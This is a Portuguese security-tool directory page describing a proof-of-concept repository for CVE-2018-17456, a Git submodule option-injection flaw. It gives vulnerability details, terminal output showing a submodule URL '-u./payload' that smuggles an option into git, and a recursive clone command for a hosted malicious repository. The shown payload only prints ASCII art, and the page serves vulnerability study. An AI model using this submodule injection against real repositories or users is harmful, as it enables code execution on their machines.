Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2018-17456 — Reprodução da vulnerabilidade CVE-2018-17456 (PoC+Exp) | Kitploit
Ferramentas/GitHubGitHub/anonymking/cve-2018-17456
Análise de VulnerabilidadesAnálise de CódigoExploraçãoSegurança da Cadeia de SuprimentosAprendizado e EducaçãoExploração de Binários
GitHubanonymking/cve-2018-17456

CVE-2018-17456

Reprodução da vulnerabilidade CVE-2018-17456 (PoC+Exp)

Ver Repositório
53há 7 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2018-17456

Visão geral da vulnerabilidade

  • Nome da vulnerabilidade: Vulnerabilidade de erro de validação de entrada do Git
  • ID CNNVD: CNNVD-201810-234
  • Nível de perigo: Crítico
  • ID CVE: CVE-2018-17456
  • Tipo de vulnerabilidade: Erro de validação de entrada
  • Data de publicação: 2018-10-08
  • Tipo de ameaça: Remota
  • Data de atualização: 2019-04-25
  • Fornecedor: debian
  • Fonte da vulnerabilidade: Atlassian, TerryZh...
  • Descrição: Git é um sistema de controle de versão distribuído gratuito e de código aberto. Existe uma vulnerabilidade de erro de validação de entrada no Git. Esta vulnerabilidade decorre do fato de o sistema de rede ou produto não validar corretamente os dados de entrada. As seguintes versões são afetadas: versões anteriores ao Git 2.14.5, versões 2.15.x anteriores a 2.15.3, versões 2.16.x anteriores a 2.16.5, versões 2.17.x anteriores a 2.17.2, versões 2.18.x anteriores a 2.18.1, versões 2.19.x anteriores a 2.19.1.

Reprodução da vulnerabilidade

  • Devido a problemas de segurança do GitHub, não é possível enviar projetos maliciosos, então você pode executar o script build.sh para construir este projeto localmente para estudo e teste.
  • A versão do Git que usei foi git-2.12.1
  • O processo e o resultado são os seguintes:
root@kitploit:~
[anonymking@localhost test]$ ./build.sh Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-17456-PoC/Submodule/.git/ [master (root-commit) 5b1e97c] submodule 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 hgt_blank Initialized empty Git repository in /home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC/.git/ Cloning into '/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC/exploit:exploit'... done. [master (root-commit) ed1914d] CVE-2018-17456 3 files changed, 6 insertions(+) create mode 100644 .gitmodules create mode 160000 exploit:exploit create mode 100755 payload git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC" des_dir [anonymking@localhost test]$ git clone --recursive "/home/anonymking/Desktop/test/CVE-2018-17456-PoC/CVE-2018-17456-PoC" test Cloning into 'test'... done. Submodule 'exploit:exploit' (-u./payload) registered for path 'exploit:exploit' Cloning into 'exploit'... ********************************************* _ooOoo_ o8888888o 88" . "88 (| -_- |) O\ = /O ____/`---'\____ .' \\| |// `. / \\||| : |||// \ / _||||| -:- |||||- \ | | \\\ - /// | | | \_| ''\---/'' | | \ .-\__ `-` ___/-. / ___`. .' /--.--\ `. . __ ."" '< `.___\_<|>_/___.' >'"". | | : `- \`.;`\ _ /`;.`/ - ` : | | \ \ `-. \_ __\ /__ _/ .-` / / ======`-.____`-.___\_____/___.-`____.-'====== `=---=' ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ fatal: Could not read from remote repository. Please make sure you have the correct access rights and the repository exists. fatal: clone of '-u./payload' into submodule path '/home/anonymking/Desktop/test/test/exploit:exploit' failed Failed to clone 'exploit:exploit' a second time, aborting
  • O código malicioso que construí no payload apenas exibe um Buda; portanto, ver o Buda significa que o teste foi bem-sucedido. Na verdade, isso é exibido duas vezes porque há uma tentativa de repetição quando o clone do submódulo falha.

Referências

  • Projeto poc-submodule

Descoberta acidental

  • Eu consegui construir este projeto no Coding — CVE-2018-17456
  • Modo de uso:
root@kitploit:~
git clone --recursive https://dev.tencent.com/u/anonymking/p/CVE-2018-17456/git test
  • Além disso, recomendo estudar duas vulnerabilidades semelhantes juntas: CVE-2017-1000117, CVE-2018-11235
Baixar ferramenta